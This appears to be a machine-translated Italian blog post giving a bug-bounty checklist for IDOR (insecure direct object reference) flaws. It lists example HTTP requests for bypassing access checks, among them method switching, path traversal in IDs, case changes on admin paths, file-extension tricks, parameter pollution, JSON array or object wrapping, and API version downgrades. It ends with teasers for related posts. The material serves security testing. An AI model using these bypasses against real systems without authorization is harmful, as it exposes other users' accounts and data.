Lista di controllo IDOR

Passi di base:

1. Create two accounts if possible or else enumerate users first. 
2. Check if the endpoint is private or public and does it contains any kind of id param.
3. Try changing the param value to some other user and see if does anything to their account.
4. Done !!

try if you can idor to view image of any profille

[ ] conto informazioni

[ ] VISUALIZZA & ELIMINA & Crea api_key

[ ] consente di leggere qualsiasi commento

[ ] cambia prezzo

[ ] cambia la moneta da dollaro a eur

[ ] Prova a decodificare l'ID, se l'ID codificato utilizzando md5, base64, ecc

GET /GetUser/dmljdGltQG1haWwuY29t
[...]

GET /users/delete/victim_id  ->403
POST /users/delete/victim_id ->200

Instead of this:
GET /api/albums?album_id=<album id>
Try This:
GET /api/albums?account_id=<account id>
Tip: There is a Burp extension called Paramalyzer which will help with this by remembering all the parameters you have passed to a host.

POST /users/delete/victim_id          ->403
POST /users/delete/my_id/..victim_id  ->200

Content-Type: application/xml ->
Content-Type: application/json

GET /file?id=90djbkdbkdbd29dd
GET /file?id=302

GET /admin/profile ->401
GET /Admin/profile ->200
GET /ADMIN/profile ->200
GET /aDmin/profile ->200
GET /adMin/profile ->200
GET /admIn/profile ->200
GET /admiN/profile ->200

GET /api/users/user_id ->
GET /api/users/*

for hashed ID ,create multiple accounts and understand the ppattern application users to allot an iD

search all the endpoints having ID which the search engine may have already indexed

use tools like arjun , paramminer

GET /api_v1/messages ->200
GET /api_v1/messages?user_id=victim_uuid ->200

GET /api_v1/messages?user_id=attacker_id&user_id=victim_id
GET /api_v1/messages?user_id=victim_id&user_id=attacker_id

GET /user_data/2341        -> 401
GET /user_data/2341.json   -> 200
GET /user_data/2341.xml    -> 200
GET /user_data/2341.config -> 200
GET /user_data/2341.txt    -> 200

{"userid":1234,"userid":2542}

{"userid":123} ->401
{"userid":[123]} ->200

{"userid":123} ->401
{"userid":{"userid":123}} ->200

GET /v3/users_data/1234 ->401
GET /v1/users_data/1234 ->200

GET /graphql
[...]
GET /graphql.php?query=
[...]

logica aziendale , registrare vulnerabilità , bypass 2fa , autenticazione

Tutta la lista di controllo in questo repository

https://github.com/Az0x7/vulnerability-Checklist

seguendomi

  • Linkedin , Twitter

Suggested posts

Viaggio di uno sceneggiatore (sviluppatore di strumenti)

Viaggio di uno sceneggiatore (sviluppatore di strumenti)

Inizia a sviluppare il tuo strumento. Ciao ragazzi, Ancora una volta vi do il benvenuto nel mio medium.

Un bug alla volta: il mio primo bug a pagamento ($ 1.000 IDOR)

Un bug alla volta: il mio primo bug a pagamento ($ 1.000 IDOR)

Ciao a tutti! Felice di rivederti :) Oggi scriverò del mio primo bug a pagamento, ha una trama divertente quindi continua a leggere! Ecco l'arte per la storia di oggi di rez0 :) Quindi iniziamo con come ho trovato questo IDOR 4. Exploit: una volta inviato, sono stato reindirizzato a un nuovo sottodominio che sembrava estremamente vecchio, questo ha suscitato il mio interesse per molteplici motivi: il nuovo sottodominio era qualcosa del tipo: http://link.

Related posts

Niente più password: come le passkey sostituiranno la tua password

Niente più password: come le passkey sostituiranno la tua password

Per evitare ambiguità verranno utilizzati i seguenti termini; Autenticatore; Il telefono cellulare utilizzato per effettuare il login Sito web; Il sito Web o l'applicazione che l'utente sta utilizzando per effettuare la richiesta di accesso al Servizio; Il fornitore che fornisce il servizio dato, ad es

Tieni traccia di chiunque abbia solo un numero di telefono | Indagine OSINT

Tieni traccia di chiunque abbia solo un numero di telefono | Indagine OSINT

Puoi essere un investigatore OSINT, un giocatore CTF o semplicemente qualcuno che riceve chiamate spam. Qualcuno che sta cercando di verificare il numero che hai visto in una pubblicità.

"La fossa delle Marianne svelata: svelare le terrificanti verità nascoste dell'abisso"

"La fossa delle Marianne svelata: svelare le terrificanti verità nascoste dell'abisso"

Introduzione:Benvenuti, coraggiosi lettori, in un viaggio che ci porterà nelle profondità più oscure del nostro pianeta. In questo blog, ci addentriamo nel mondo enigmatico della Fossa delle Marianne, scoprendo i suoi segreti nascosti e scoprendo le verità agghiaccianti che giacciono sotto la sua superficie.

i pronomi sono super spaventosi

Mi colpisce Improvvisamente come spesso accade È di nuovo la via di mezzo <No, non quello nel pacifico tu marrone, quello al carnevale> Ogni titolo a voce alta…..